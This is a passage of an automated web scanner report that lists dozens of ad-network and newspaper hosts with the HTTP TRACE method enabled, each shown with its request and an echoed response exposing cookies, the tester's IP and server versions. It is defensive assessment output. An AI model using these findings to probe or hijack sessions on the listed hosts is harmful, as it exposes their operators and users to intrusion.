X-Forwarded-For: 50.23.123.106

20.9. http://fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: fetchback.com
Cookie: 3fbae2a6713cc100

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:18:27 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: fetchback.com
Cookie: 3fbae2a6713cc100; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; act=1_131532
...[SNIP]...
20.10. http://hearst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hearst.com
Path:   /

Request

TRACE / HTTP/1.0
Host: hearst.com
Cookie: e822b802f2edf746

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:22:31 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hearst.com
Cookie: e822b802f2edf746

20.11. http://hfm.checkm8.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hfm.checkm8.com
Path:   /

Request

TRACE / HTTP/1.0
Host: hfm.checkm8.com
Cookie: 45c5ce7151a6031e

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hfm.checkm8.com
Cookie: 45c5ce7151a6031e; dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; cm8dccp=; A=dqR5Y9wlLIIUv9UJ7MTba; C=oYX5Y9we4KW1caacaSI0P3Xb

20.12. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: bfed602ce1a575c7

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:15 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: bfed602ce1a575c7; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DD
...[SNIP]...
20.13. http://img.pulsemgr.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /

Request

TRACE / HTTP/1.0
Host: img.pulsemgr.com
Cookie: f01892ebde8505fa

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:37 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: img.pulsemgr.com
Cookie: f01892ebde8505fa; p=OPTOUT; c=1

20.14. http://internetmarketing.localedge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://internetmarketing.localedge.com
Path:   /

Request

TRACE / HTTP/1.0
Host: internetmarketing.localedge.com
Cookie: 5ed2426ff94c0456

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:36:38 GMT
Server: Apache/2.2.10 (Unix) DAV/2 PHP/5.2.6 mod_jk/1.2.30
Content-Type: message/http
X-Cache: MISS from wd-44
Via: 1.0 wd-44 (squid/3.1.11)
Connection: close

TRACE / HTTP/1.1
Host: internetmarketing.localedge.com
Cookie: 5ed2426ff94c0456
Via: 1.0 wd-44 (squid/3.1.11)
X-Forwarded-For: 50.23.123.106
Cache-Control: max-age=1800
Connection: keep-alive

20.15. http://login.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 1e80546a09105339

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:24:02 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 1e80546a09105339; Apache=50.23.123.106.1316278089935646; DotomiStatus=5; DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHIzxZewFTXBUgOFBKYHtrfgoKBQpCXAECVkBLQlUCJjFWfmp3CzQBfEMHZV4LB3JV
...[SNIP]...
20.16. http://nai.ad.us-ec.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.ad.us-ec.adtechus.com
Cookie: 21eef7fa524293de

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.ad.us-ec.adtechus.com
Cookie: 21eef7fa524293de; OO_TOKEN=1120281364; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.17. http://nai.adserver.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserver.adtechus.com
Cookie: 3d5b20af92dc2517

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserver.adtechus.com
Cookie: 3d5b20af92dc2517; OO_TOKEN=681228259; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.18. http://nai.adserverec.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserverec.adtechus.com
Cookie: 94d2dafc13552d12

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserverec.adtechus.com
Cookie: 94d2dafc13552d12; OO_TOKEN=1710369765; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.19. http://nai.adserverwc.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adserverwc.adtechus.com
Cookie: 79441b16b4bae000

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adserverwc.adtechus.com
Cookie: 79441b16b4bae000; OO_TOKEN=1664201834; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.20. http://nai.adsonar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adsonar.com
Cookie: 290c0cb4950b1b4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adsonar.com
Cookie: 290c0cb4950b1b4; OO_TOKEN=1331479124; oo_flag=t
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.21. http://nai.adtech.de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.adtech.de
Cookie: e520cc23a0b37500

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.adtech.de
Cookie: e520cc23a0b37500; OO_TOKEN=876484099; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.22. http://nai.advertising.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.advertising.com
Cookie: f3ac6d971010ff84

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.advertising.com
Cookie: f3ac6d971010ff84; OO_TOKEN=745519684; ACID=tX790013123977920032; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWB
...[SNIP]...
20.23. http://nai.btrll.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.btrll.com
Cookie: 833f75b7bd2fc775

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:51 GMT
Server: Apache/2.0.63 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.btrll.com
Cookie: 833f75b7bd2fc775; id=OPT_OUT
X-EKC-SRM-ARM: 50.23.123.106

20.24. http://nai.glb.adtechus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.glb.adtechus.com
Cookie: c60d81425f17a0e

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.glb.adtechus.com
Cookie: c60d81425f17a0e; OO_TOKEN=1952319602; JEB2=NOID; OptOut=we will not set any more cookies
Connection: Keep-Alive
X-LB-Client-IP: 50.23.123.106
X-Forwarded-For: 50.23.123.106

20.25. http://nai.tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: nai.tacoda.at.atwola.com
Cookie: c96c50dad3ed0160

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nai.tacoda.at.atwola.com
Cookie: c96c50dad3ed0160; OO_TOKEN=1458996317; ANRTT=; TData=; N=; Tsid=; eadx=; ATTACID=; ATTAC=; atdses=O; JEB2=4E45A26F6E651A2318BD90FFF001EBF9; cords=MToxMzE1NDkwMjg2OjUsMTMxNTQ5MDI4Njo3LDA=
Connection: Keep-Alive
X-LB-
...[SNIP]...
20.26. http://nocookie.w55c.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nocookie.w55c.net
Path:   /

Request

TRACE / HTTP/1.0
Host: nocookie.w55c.net
Cookie: b08943219218d161

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: nocookie.w55c.net
Cookie: b08943219218d161; matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; matchappnexus=1; matchdatran=1;
...[SNIP]...
20.27. http://notrack.adviva.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.adviva.net
Cookie: 96f8c797a274745d

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:32 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.adviva.net
Cookie: 96f8c797a274745d; ADVIVA=NOTRACK

20.28. http://notrack.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.specificclick.net
Cookie: ff6467d11df7fd75

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.specificclick.net
Cookie: ff6467d11df7fd75; ADVIVA=NOTRACK; ug=ZtIIq0E24-85mD

20.29. http://notrack.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: notrack.specificmedia.com
Cookie: 49b7a1d88f21939d

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:14 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: notrack.specificmedia.com
Cookie: 49b7a1d88f21939d; ADVIVA=NOTRACK

20.30. http://optout.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.33across.com
Cookie: 8816ca60b6511162

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.33across.com
Cookie: 8816ca60b6511162; 33x_nc=33Across+Optout; 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1316270110800%3As2.33%3D%2C6940%2C100043%2C100072%2C

20.31. http://optout.adlegend.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.adlegend.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.adlegend.com
Cookie: 625ca1c5464f5df6

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:01 GMT
Server: Apache/2.2.16 (Unix) PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.adlegend.com
Cookie: 625ca1c5464f5df6; ID=OPT_OUT

20.32. http://optout.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.com
Cookie: 969ec6f7bcca5df9

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:37 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.com
Cookie: 969ec6f7bcca5df9; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
Connection: Keep-Alive
MIG_IP: 50.23.123.106

20.33. http://optout.mookie1.decdna.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decdna.net
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.decdna.net
Cookie: d8c15b97fd8ade5

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:27 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.decdna.net
Cookie: d8c15b97fd8ade5; NSC_pqupvu_efdeob_qppm_iuuq=ffffffff0941322045525d5f4f58455e445a4a423660; %2edecdna%2enet/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106

20.34. http://optout.mookie1.decideinteractive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.decideinteractive.com
Cookie: 43897c4fb24e240b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:41 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.decideinteractive.com
Cookie: 43897c4fb24e240b; NSC_pqupvu_efdeobjou_qppm_iuuq=ffffffff0941322345525d5f4f58455e445a4a423660; %2edecideinteractive%2ecom/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106

20.35. http://optout.mookie1.dtfssearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.dtfssearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.dtfssearch.com
Cookie: 5de30f2b7521a0b5

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:48:10 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.dtfssearch.com
Cookie: 5de30f2b7521a0b5; NSC_pqupvu_eugttfbsdi_qppm_iuuq=ffffffff0941322b45525d5f4f58455e445a4a423660; %2edtfssearch%2ecom/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106

20.36. http://optout.mookie1.pm14.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optout.mookie1.pm14.com
Cookie: 64a68bfc4f4c4701

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:54 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: optout.mookie1.pm14.com
Cookie: 64a68bfc4f4c4701; NSC_pqupvu_qn14_qppm_iuuq=ffffffff0941322845525d5f4f58455e445a4a423660; %2epm14%2ecom/%2f/1/o=0/cookie
Connection: Keep-Alive
MIG_IP: 50.23.123.106

20.37. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 9e5dd19817220c79

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 9e5dd19817220c79; __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; act=1_131532
...[SNIP]...
20.38. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 653a9308422ee468

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 653a9308422ee468; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1
...[SNIP]...
20.39. http://r.openx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 477212041487b038

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 477212041487b038; p=1315756063; i=d2a43928-76cd-49ea-b899-b41fb371435f
X-Forwarded-For: 50.23.123.106

20.40. http://r.skimresources.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /

Request

TRACE / HTTP/1.0
Host: r.skimresources.com
Cookie: b4d8ee89a206c09c

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 17 Sep 2011 16:38:55 GMT
Server: Apache
Content-Length: 219
Connection: Close

TRACE / HTTP/1.1
host: r.skimresources.com
Cookie: b4d8ee89a206c09c; skimGUID=af7c6cccf2814117102a6929c45f1eb3
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

20.41. http://rt.legolas-media.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 634f51751e2c40a4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:21:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 634f51751e2c40a4; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQASAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB

20.42. http://s.xp1.ru4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: a256c9971b030220

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 16:46:17 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: a256c9971b030220; X1ID=OO-00000000000000000
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106

20.43. http://seattlepi.ux.hearstdigitalnews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seattlepi.ux.hearstdigitalnews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: seattlepi.ux.hearstdigitalnews.com
Cookie: d12c0f1a28c20577

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:26:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: seattlepi.ux.hearstdigitalnews.com
Cookie: d12c0f1a28c20577

20.44. http://sensor2.suitesmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 40af9682de97f33e

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 40af9682de97f33e; G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727; G14531=C1S102386-3-0-0-0-1316276740-852
...[SNIP]...
20.45. http://stamfordadvocate.ux.hearstdigitalnews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stamfordadvocate.ux.hearstdigitalnews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: stamfordadvocate.ux.hearstdigitalnews.com
Cookie: e70344cbd99d83d2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: stamfordadvocate.ux.hearstdigitalnews.com
Cookie: e70344cbd99d83d2

20.46. http://system.casalemedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://system.casalemedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: system.casalemedia.com
Cookie: 264e05a5ce7bce65

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: system.casalemedia.com
Cookie: 264e05a5ce7bce65; CMO=2

20.47. http://tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: 4406d651bda3cdfa

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:09 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 4406d651bda3cdfa; ANRTT=; TData=; N=; Tsid=; eadx=; ATTACID=; ATTAC=; atdses=O; JEB2=4E45A26F6E651A2318BD90FFF001EBF9; cords=MToxMzE1NDkwMjg2OjUsMTMxNTQ5MDI4Njo3LDA=
Host: tacoda.at.atwola.com
X-Forwarded-For: 50.23
...[SNIP]...
20.48. http://test.ctpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://test.ctpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: test.ctpost.com
Cookie: 3dc45f5d848acf2c

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:48:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: test.ctpost.com
Cookie: 3dc45f5d848acf2c; testuid=50.23.123.106.1316276969433719
X-Timestamp: t=1316278093149888

20.49. http://usucmweb.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usucmweb.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: usucmweb.dotomi.com
Cookie: 5250a4107f577245

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:01 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usucmweb.dotomi.com
Cookie: 5250a4107f577245; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

20.50. http://www.addthis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: cf81638e894bf09f

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: cf81638e894bf09f; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

20.51. http://www.casalemedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casalemedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.casalemedia.com
Cookie: 1332673bb5a998ef

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.casalemedia.com
Cookie: 1332673bb5a998ef; CMO=2

20.52. http://www.chron.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chron.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chron.com
Cookie: ea1e0ff83f43374

Response

HTTP/1.1 200 OK
